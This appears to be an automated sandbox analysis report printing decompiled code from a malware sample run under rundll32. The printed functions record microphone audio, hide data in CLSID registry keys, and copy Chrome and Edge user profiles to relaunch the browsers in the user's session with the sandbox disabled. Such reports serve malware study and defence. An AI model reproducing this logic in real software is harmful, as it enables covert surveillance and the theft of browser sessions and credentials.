                                                            • String ID: %04d-%02d-%02d %02d:%02d
                                                            • API String ID: 4290651727-1132360693
                                                            • Opcode ID: a190f5a9679de7201290cd73bae3ce9e4d5873dadc3cafff6923fbcca527a927
                                                            • Instruction ID: 3d75acccba8d9d0eff7d05e6fedf74ed705b4bc2e2b69435470a8ebb74fb72ea
                                                            • Opcode Fuzzy Hash: a190f5a9679de7201290cd73bae3ce9e4d5873dadc3cafff6923fbcca527a927
                                                            • Instruction Fuzzy Hash: 7C117F72108300AFD3549B64DC4AFBB77ECEB88725F00060EF99AD61D0FA68E944C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04631550(intOrPtr _a4) {
                                                            				struct tagMSG _v32;
                                                            				intOrPtr _t19;
                                                            				signed int _t30;
                                                            				intOrPtr _t34;
                                                            
                                                            				if(GetMessageW( &_v32, 0, 0, 0) == 0) {
                                                            					L7:
                                                            					return 0;
                                                            				} else {
                                                            					_t34 = _a4;
                                                            					do {
                                                            						_t19 = _v32.message;
                                                            						if(_t19 != 0x3c0) {
                                                            							L5:
                                                            							if(_t19 == 0x3bf) {
                                                            								goto L7;
                                                            							} else {
                                                            								goto L6;
                                                            							}
                                                            						} else {
                                                            							SetEvent( *(_t34 + 0x24));
                                                            							WaitForSingleObject( *(_t34 + 0x28), 0xffffffff);
                                                            							 *((intOrPtr*)(_t34 + 0x1c)) = 1;
                                                            							_t30 = waveInAddBuffer( *(_t34 + 0x18),  *(_t34 + 0x30 + (1 -  *((intOrPtr*)(_t34 + 0x1c))) * 4), 0x20);
                                                            							if(_t30 != 0) {
                                                            								return _t30 | 0xffffffff;
                                                            							} else {
                                                            								_t19 = _v32.message;
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            						goto L9;
                                                            						L6:
                                                            						TranslateMessage( &_v32);
                                                            						DispatchMessageW( &_v32);
                                                            					} while (GetMessageW( &_v32, 0, 0, 0) != 0);
                                                            					goto L7;
                                                            				}
                                                            				L9:
                                                            			}







                                                            0x0463156d
                                                            0x046315e8
                                                            0x046315ee
                                                            0x0463156f
                                                            0x0463156f
                                                            0x04631580
                                                            0x04631580
                                                            0x04631588
                                                            0x046315bf
                                                            0x046315c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463158a
                                                            0x0463158d
                                                            0x04631598
                                                            0x046315a8
                                                            0x046315b2
                                                            0x046315ba
                                                            0x046315fa
                                                            0x046315bc
                                                            0x046315bc
                                                            0x00000000
                                                            0x046315bc
                                                            0x046315ba
                                                            0x00000000
                                                            0x046315c6
                                                            0x046315ca
                                                            0x046315d0
                                                            0x046315e2
                                                            0x00000000
                                                            0x04631580
                                                            0x00000000

                                                            APIs
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04631569
                                                            • SetEvent.KERNEL32(?), ref: 0463158D
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04631598
                                                            • waveInAddBuffer.WINMM(?,?,00000020), ref: 046315B2
                                                            • TranslateMessage.USER32(?), ref: 046315CA
                                                            • DispatchMessageW.USER32(?), ref: 046315D0
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 046315E0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                                            • String ID:
                                                            • API String ID: 3294988761-0
                                                            • Opcode ID: 2033b0f47881e5d892c5c73b7444e84df343140752aeef42a6ea8206c99fe51d
                                                            • Instruction ID: bd1ce597cce805962bbc2dee80050e572d8401147b9bae120c93247d017b2e57
                                                            • Opcode Fuzzy Hash: 2033b0f47881e5d892c5c73b7444e84df343140752aeef42a6ea8206c99fe51d
                                                            • Instruction Fuzzy Hash: 08118672A403099BDB20DFA9EC49FAAB7B8EB05731F101625F615D61D0FB35F9118B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E04647C90(void* __ecx, signed char* _a4) {
                                                            				void* _t22;
                                                            				intOrPtr _t23;
                                                            				void* _t28;
                                                            				intOrPtr* _t31;
                                                            				intOrPtr _t32;
                                                            
                                                            				_t28 = __ecx;
                                                            				_t22 = ( *_a4 & 0x000000ff) + 0xffffffe1;
                                                            				if(_t22 > 0x5c) {
                                                            					L7:
                                                            					_t23 =  *((intOrPtr*)(_t28 + 4));
                                                            					_t31 =  *((intOrPtr*)(_t23 + 0x20));
                                                            					 *(_t23 + 0x44) = 1;
                                                            					if(_t31 != 0) {
                                                            						L10:
                                                            						return  *((intOrPtr*)( *_t31 + 4))();
                                                            					}
                                                            					_t32 =  *((intOrPtr*)(_t23 + 0x24));
                                                            					if(_t32 != 0) {
                                                            						_t31 = _t32 + 4;
                                                            						goto L10;
                                                            					}
                                                            					return _t23;
                                                            				} else {
                                                            					switch( *((intOrPtr*)(( *(_t22 + 0x4647d70) & 0x000000ff) * 4 +  &M04647D58))) {
                                                            						case 0:
                                                            							__eax = __ebx + 0xec;
                                                            							__eax = InterlockedExchange(__ebx + 0xec, 1);
                                                            							 *((intOrPtr*)(__ebx + 0xe8)) = 0x3f;
                                                            							return __eax;
                                                            							goto L12;
                                                            						case 1:
                                                            							__eax = __ebx + 0xec;
                                                            							__eax = InterlockedExchange(__ebx + 0xec, 0);
                                                            							 *((intOrPtr*)(__ebx + 0xe8)) = 0x1f;
                                                            							return __eax;
                                                            							goto L12;
                                                            						case 2:
                                                            							_push(__edi);
                                                            							__edi =  *(__ecx + 5);
                                                            							__ebx + 0x10 = InterlockedExchange(__ebx + 0x10,  *(__ecx + 1));
                                                            							__eax = __ebx + 0x14;
                                                            							__eax = InterlockedExchange(__ebx + 0x14, __edi);
                                                            							_pop(__edi);
                                                            							return __eax;
                                                            							goto L12;
                                                            						case 3:
                                                            							__eax =  *(__ecx + 1);
                                                            							 *(__ebx + 0xf4) = __eax;
                                                            							return __eax;
                                                            							goto L12;
                                                            						case 4:
                                                            							return SetEvent( *(__ecx + 0x18));
                                                            							goto L12;
                                                            						case 5:
                                                            							goto L7;
                                                            					}
                                                            				}
                                                            				L12:
                                                            			}








                                                            0x04647c94
                                                            0x04647c9c
                                                            0x04647ca2
                                                            0x04647d30
                                                            0x04647d30
                                                            0x04647d33
                                                            0x04647d36
                                                            0x04647d3f
                                                            0x04647d4b
                                                            0x00000000
                                                            0x04647d4d
                                                            0x04647d41
                                                            0x04647d46
                                                            0x04647d48
                                                            0x00000000
                                                            0x04647d48
                                                            0x04647d52
                                                            0x04647ca8
                                                            0x04647caf
                                                            0x00000000
                                                            0x04647ce8
                                                            0x04647cef
                                                            0x04647cf5
                                                            0x04647d01
                                                            0x00000000
                                                            0x00000000
                                                            0x04647d06
                                                            0x04647d0d
                                                            0x04647d13
                                                            0x04647d1f
                                                            0x00000000
                                                            0x00000000
                                                            0x04647cc4
                                                            0x04647cc8
                                                            0x04647ccf
                                                            0x04647cd6
                                                            0x04647cda
                                                            0x04647ce0
                                                            0x04647ce3
                                                            0x00000000
                                                            0x00000000
                                                            0x04647d22
                                                            0x04647d25
                                                            0x04647d2d
                                                            0x00000000
                                                            0x00000000
                                                            0x04647cc1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04647caf
                                                            0x00000000

                                                            APIs
                                                            • SetEvent.KERNEL32(?), ref: 04647CB9
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 04647CCF
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 04647CDA
                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 04647CEF
                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 04647D0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExchangeInterlocked$Event
                                                            • String ID: ?
                                                            • API String ID: 767157976-1684325040
                                                            • Opcode ID: e4268ed00c6781f87c23f78a44e4d521ab84ffc20e903d138d0a89fcaf91aecb
                                                            • Instruction ID: d070b01e0f4edb24bc91b8ba0a90a3babc4bb6502d74f7e8c4b37551d80a8cc3
                                                            • Opcode Fuzzy Hash: e4268ed00c6781f87c23f78a44e4d521ab84ffc20e903d138d0a89fcaf91aecb
                                                            • Instruction Fuzzy Hash: AC216076104104CFDB04DF60E8C8FA67BA8FB98315F1485ABE90A8F252D737D421DB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0466C196(intOrPtr _a4) {
                                                            				void* _t18;
                                                            				intOrPtr _t45;
                                                            
                                                            				_t45 = _a4;
                                                            				if(_t45 != 0) {
                                                            					E0466C15A(_t45, 7);
                                                            					_t2 = _t45 + 0x1c; // 0x1d
                                                            					E0466C15A(_t2, 7);
                                                            					_t3 = _t45 + 0x38; // 0x39
                                                            					E0466C15A(_t3, 0xc);
                                                            					_t4 = _t45 + 0x68; // 0x69
                                                            					E0466C15A(_t4, 0xc);
                                                            					_t5 = _t45 + 0x98; // 0x99
                                                            					E0466C15A(_t5, 2);
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0xa0)));
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0xa4)));
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0xa8)));
                                                            					_t9 = _t45 + 0xb4; // 0xb5
                                                            					E0466C15A(_t9, 7);
                                                            					_t10 = _t45 + 0xd0; // 0xd1
                                                            					E0466C15A(_t10, 7);
                                                            					_t11 = _t45 + 0xec; // 0xed
                                                            					E0466C15A(_t11, 0xc);
                                                            					_t12 = _t45 + 0x11c; // 0x11d
                                                            					E0466C15A(_t12, 0xc);
                                                            					_t13 = _t45 + 0x14c; // 0x14d
                                                            					E0466C15A(_t13, 2);
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0x154)));
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0x158)));
                                                            					E046684AD( *((intOrPtr*)(_t45 + 0x15c)));
                                                            					return E046684AD( *((intOrPtr*)(_t45 + 0x160)));
                                                            				}
                                                            				return _t18;
                                                            			}





                                                            0x0466c19c
                                                            0x0466c1a1
                                                            0x0466c1aa
                                                            0x0466c1af
                                                            0x0466c1b5
                                                            0x0466c1ba
                                                            0x0466c1c0
                                                            0x0466c1c5
                                                            0x0466c1cb
                                                            0x0466c1d0
                                                            0x0466c1d9
                                                            0x0466c1e4
                                                            0x0466c1ef
                                                            0x0466c1fa
                                                            0x0466c1ff
                                                            0x0466c208
                                                            0x0466c20d
                                                            0x0466c216
                                                            0x0466c21e
                                                            0x0466c227
                                                            0x0466c22c
                                                            0x0466c235
                                                            0x0466c23a
                                                            0x0466c243
                                                            0x0466c24e
                                                            0x0466c259
                                                            0x0466c264
                                                            0x00000000
                                                            0x0466c274
                                                            0x0466c279

                                                            APIs
                                                              • Part of subcall function 0466C15A: _free.LIBCMT ref: 0466C183
                                                            • _free.LIBCMT ref: 0466C1E4
                                                              • Part of subcall function 046684AD: HeapFree.KERNEL32(00000000,00000000,?,046612C5,00000001,00000001), ref: 046684C3
                                                              • Part of subcall function 046684AD: GetLastError.KERNEL32(D355BE4E,?,046612C5,00000001,00000001), ref: 046684D5
                                                            • _free.LIBCMT ref: 0466C1EF
                                                            • _free.LIBCMT ref: 0466C1FA
                                                            • _free.LIBCMT ref: 0466C24E
                                                            • _free.LIBCMT ref: 0466C259
                                                            • _free.LIBCMT ref: 0466C264
                                                            • _free.LIBCMT ref: 0466C26F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: f0a7334c6dbb5677564b686ea8814ec6d71082e467f4995945020664cc9d3a81
                                                            • Instruction ID: a2f6c9238f0f62ddb743e20be2b155abf62ddee3718cbc8a312b1d6c7a79669f
                                                            • Opcode Fuzzy Hash: f0a7334c6dbb5677564b686ea8814ec6d71082e467f4995945020664cc9d3a81
                                                            • Instruction Fuzzy Hash: 1E1124B2581F04AAF520B7B0CC45FDBBB9C6F04714F804C2DBBDB6A150E665B5054AA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E0463A080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				signed int _t14;
                                                            				intOrPtr* _t16;
                                                            				int _t26;
                                                            				intOrPtr _t32;
                                                            				void* _t37;
                                                            				int _t41;
                                                            				char* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t14 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t14 ^ _t44;
                                                            				_t43 = __ecx;
                                                            				_t16 = __ecx;
                                                            				_t37 = __ecx + 2;
                                                            				do {
                                                            					_t32 =  *_t16;
                                                            					_t16 = _t16 + 2;
                                                            				} while (_t32 != 0);
                                                            				_t41 = 2 + (_t16 - _t37 >> 1) * 2;
                                                            				E046454D0(__ecx, _t41);
                                                            				E04646050(__ebx, L"Global",  &_v88, _t41, __ecx);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v612 = 0;
                                                            				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                            				if(_t26 == 0) {
                                                            					RegSetValueExW(_v612, "3", _t26, 3, _t43, _t41);
                                                            					RegCloseKey(_v612);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t44);
                                                            			}















                                                            0x0463a089
                                                            0x0463a090
                                                            0x0463a094
                                                            0x0463a096
                                                            0x0463a099
                                                            0x0463a0a0
                                                            0x0463a0a0
                                                            0x0463a0a3
                                                            0x0463a0a6
                                                            0x0463a0b1
                                                            0x0463a0ba
                                                            0x0463a0c7
                                                            0x0463a0dc
                                                            0x0463a0e5
                                                            0x0463a111
                                                            0x0463a119
                                                            0x0463a12b
                                                            0x0463a137
                                                            0x0463a137
                                                            0x0463a14c

                                                            APIs
                                                            • wsprintfW.USER32 ref: 0463A0DC
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 0463A111
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E120,00000000,00000003), ref: 0463A12B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463A137
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValuewsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 4211343355-1865207932
                                                            • Opcode ID: 9ee14e5bb920020c2cecb6b3049bdecc3a6d3a767ccab5372d9da015b971ee7a
                                                            • Instruction ID: 09d15bf3f506afb4d18c7e166ec123de2264f02bb9ee8a35aebd312034f15dd8
                                                            • Opcode Fuzzy Hash: 9ee14e5bb920020c2cecb6b3049bdecc3a6d3a767ccab5372d9da015b971ee7a
                                                            • Instruction Fuzzy Hash: F5119331604218ABDB20DF94EC4DFAAB77CEB84701F004198F906EB280FB756E04DB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E0463A150(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				signed int _t14;
                                                            				char* _t20;
                                                            				int _t26;
                                                            				char _t33;
                                                            				char* _t38;
                                                            				int _t41;
                                                            				char* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t14 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t14 ^ _t44;
                                                            				_t43 = __ecx;
                                                            				E04646050(__ebx, L"Global",  &_v88, __edi, __ecx);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_t20 = _t43;
                                                            				_t38 =  &(_t20[2]);
                                                            				do {
                                                            					_t33 =  *_t20;
                                                            					_t20 =  &(_t20[2]);
                                                            				} while (_t33 != 0);
                                                            				_t41 = 2 + (_t20 - _t38 >> 1) * 2;
                                                            				E046454D0(_t43, _t41);
                                                            				_v612 = 0;
                                                            				_t26 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                            				if(_t26 == 0) {
                                                            					RegSetValueExW(_v612, "2", _t26, 3, _t43, _t41);
                                                            					RegCloseKey(_v612);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t44);
                                                            			}















                                                            0x0463a159
                                                            0x0463a160
                                                            0x0463a164
                                                            0x0463a16f
                                                            0x0463a184
                                                            0x0463a18a
                                                            0x0463a18f
                                                            0x0463a192
                                                            0x0463a192
                                                            0x0463a195
                                                            0x0463a198
                                                            0x0463a1a3
                                                            0x0463a1ac
                                                            0x0463a1b9
                                                            0x0463a1dd
                                                            0x0463a1e5
                                                            0x0463a1f7
                                                            0x0463a203
                                                            0x0463a203
                                                            0x0463a218

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463A184
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0463A1DD
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E124,00000000,00000003), ref: 0463A1F7
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463A203
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1865207932
                                                            • Opcode ID: a23806e10f7cade3c55585005c9b52de227c844dac9180adab389953da987610
                                                            • Instruction ID: 69f8286725e0fa12e3bdc9ca043e390091215f944e4b2d2eea15fc1e1c1461aa
                                                            • Opcode Fuzzy Hash: a23806e10f7cade3c55585005c9b52de227c844dac9180adab389953da987610
                                                            • Instruction Fuzzy Hash: 7111B631600218ABDB20DF94DC4DFAAB37CEB84700F004199E906E7280FB756E04DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			E04636880(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v12;
                                                            				short _v536;
                                                            				short _v1056;
                                                            				char _v1060;
                                                            				char _v1076;
                                                            				signed int _t18;
                                                            				void* _t20;
                                                            				void* _t48;
                                                            				signed int _t50;
                                                            
                                                            				_t18 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t18 ^ _t50;
                                                            				_t48 = __ecx;
                                                            				_v1060 = 0x104;
                                                            				_t20 = E04647240( &_v536,  &_v1060, __eflags);
                                                            				_t56 = _t20;
                                                            				if(_t20 == 0) {
                                                            					__eflags = _v12 ^ _t50;
                                                            					return E04655AFE(_v12 ^ _t50);
                                                            				} else {
                                                            					lstrcatW( &_v536, L"\\AppData\\Local\\Google\\Chrome\\User Data");
                                                            					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
                                                            					L046473D0(__ebx,  &_v536,  &_v1056, _t48, __esi);
                                                            					wsprintfW( &_v536, L"cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movups [ebp-0x430], xmm0");
                                                            					_push( &_v1076);
                                                            					_push( &_v536);
                                                            					E046472E0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
                                                            					return E04655AFE(_v12 ^ _t50,  &_v536);
                                                            				}
                                                            			}












                                                            0x04636889
                                                            0x04636890
                                                            0x04636894
                                                            0x04636896
                                                            0x046368ac
                                                            0x046368b1
                                                            0x046368b3
                                                            0x04636951
                                                            0x0463695c
                                                            0x046368b9
                                                            0x046368c5
                                                            0x046368e1
                                                            0x046368f3
                                                            0x0463690b
                                                            0x0463691d
                                                            0x04636920
                                                            0x04636927
                                                            0x04636931
                                                            0x04636933
                                                            0x04636949
                                                            0x04636949

                                                            APIs
                                                              • Part of subcall function 04647240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,046368B1), ref: 04647269
                                                              • Part of subcall function 04647240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647279
                                                              • Part of subcall function 04647240: CloseHandle.KERNEL32(?,?,?,?,046368B1), ref: 046472A0
                                                            • lstrcatW.KERNEL32(?,\AppData\Local\Google\Chrome\User Data), ref: 046368C5
                                                            • wsprintfW.USER32 ref: 046368E1
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 04647414
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467F170), ref: 0464742C
                                                              • Part of subcall function 046473D0: CreateDirectoryW.KERNEL32(?,00000000), ref: 04647431
                                                              • Part of subcall function 046473D0: GetLastError.KERNEL32 ref: 04647441
                                                              • Part of subcall function 046473D0: FindFirstFileW.KERNEL32(?,?), ref: 0464745C
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 046474A3
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467D92C), ref: 046474B5
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,?), ref: 046474C5
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 046474EA
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467D92C), ref: 046474FC
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,?), ref: 0464750C
                                                              • Part of subcall function 046473D0: lstrcmpW.KERNEL32(?,0467D940), ref: 04647523
                                                              • Part of subcall function 046473D0: lstrcmpW.KERNEL32(?,0467D944), ref: 04647535
                                                            • wsprintfW.USER32 ref: 0463690B
                                                              • Part of subcall function 046472E0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04647329
                                                              • Part of subcall function 046472E0: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647339
                                                              • Part of subcall function 046472E0: CreateProcessAsUserW.ADVAPI32(?,00000000,04636938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04647386
                                                            Strings
                                                            • \AppData\Local\Google\Chrome\User Data, xrefs: 046368B9
                                                            • %s%s, xrefs: 046368DB
                                                            • cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%, xrefs: 04636905
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$AddressCreateLibraryLoadProclstrcmpwsprintf$CloseDirectoryErrorFileFindFirstHandleLastProcessUser
                                                            • String ID: %s%s$\AppData\Local\Google\Chrome\User Data$cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                            • API String ID: 3549361973-1696747008
                                                            • Opcode ID: 6861a1d45b994fecaad458607889166c7d2dd3e9be50235a70eb823fc2404839
                                                            • Instruction ID: acc4ff5d8616981b166369ff5fa490e7be8cb8f33343c24f6d911f5b093a19f7
                                                            • Opcode Fuzzy Hash: 6861a1d45b994fecaad458607889166c7d2dd3e9be50235a70eb823fc2404839
                                                            • Instruction Fuzzy Hash: B22166B1A4011D9BCB10EB74DC899DAB3BCEF54304F4045E5A509A3141FB70AA95CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			E04636960(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v12;
                                                            				short _v536;
                                                            				short _v1056;
                                                            				char _v1060;
                                                            				char _v1076;
                                                            				signed int _t18;
                                                            				void* _t20;
                                                            				void* _t48;
                                                            				signed int _t50;
                                                            
                                                            				_t18 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t18 ^ _t50;
                                                            				_t48 = __ecx;
                                                            				_v1060 = 0x104;
                                                            				_t20 = E04647240( &_v536,  &_v1060, __eflags);
                                                            				_t56 = _t20;
                                                            				if(_t20 == 0) {
                                                            					__eflags = _v12 ^ _t50;
                                                            					return E04655AFE(_v12 ^ _t50);
                                                            				} else {
                                                            					lstrcatW( &_v536, L"\\AppData\\Local\\Microsoft\\Edge\\User Data");
                                                            					wsprintfW( &_v1056, L"%s%s",  &_v536,  *((intOrPtr*)(_t48 + 0x70)));
                                                            					L046473D0(__ebx,  &_v536,  &_v1056, _t48, __esi);
                                                            					wsprintfW( &_v536, L"cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\"%s\"",  &_v1056);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movups [ebp-0x430], xmm0");
                                                            					_push( &_v1076);
                                                            					_push( &_v536);
                                                            					E046472E0(__ebx,  *((intOrPtr*)(_t48 + 0x70)), _t56);
                                                            					return E04655AFE(_v12 ^ _t50,  &_v536);
                                                            				}
                                                            			}












                                                            0x04636969
                                                            0x04636970
                                                            0x04636974
                                                            0x04636976
                                                            0x0463698c
                                                            0x04636991
                                                            0x04636993
                                                            0x04636a31
                                                            0x04636a3c
                                                            0x04636999
                                                            0x046369a5
                                                            0x046369c1
                                                            0x046369d3
                                                            0x046369eb
                                                            0x046369fd
                                                            0x04636a00
                                                            0x04636a07
                                                            0x04636a11
                                                            0x04636a13
                                                            0x04636a29
                                                            0x04636a29

                                                            APIs
                                                              • Part of subcall function 04647240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,046368B1), ref: 04647269
                                                              • Part of subcall function 04647240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647279
                                                              • Part of subcall function 04647240: CloseHandle.KERNEL32(?,?,?,?,046368B1), ref: 046472A0
                                                            • lstrcatW.KERNEL32(?,\AppData\Local\Microsoft\Edge\User Data), ref: 046369A5
                                                            • wsprintfW.USER32 ref: 046369C1
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 04647414
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467F170), ref: 0464742C
                                                              • Part of subcall function 046473D0: CreateDirectoryW.KERNEL32(?,00000000), ref: 04647431
                                                              • Part of subcall function 046473D0: GetLastError.KERNEL32 ref: 04647441
                                                              • Part of subcall function 046473D0: FindFirstFileW.KERNEL32(?,?), ref: 0464745C
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 046474A3
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467D92C), ref: 046474B5
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,?), ref: 046474C5
                                                              • Part of subcall function 046473D0: lstrcpyW.KERNEL32(?,?), ref: 046474EA
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,0467D92C), ref: 046474FC
                                                              • Part of subcall function 046473D0: lstrcatW.KERNEL32(?,?), ref: 0464750C
                                                              • Part of subcall function 046473D0: lstrcmpW.KERNEL32(?,0467D940), ref: 04647523
                                                              • Part of subcall function 046473D0: lstrcmpW.KERNEL32(?,0467D944), ref: 04647535
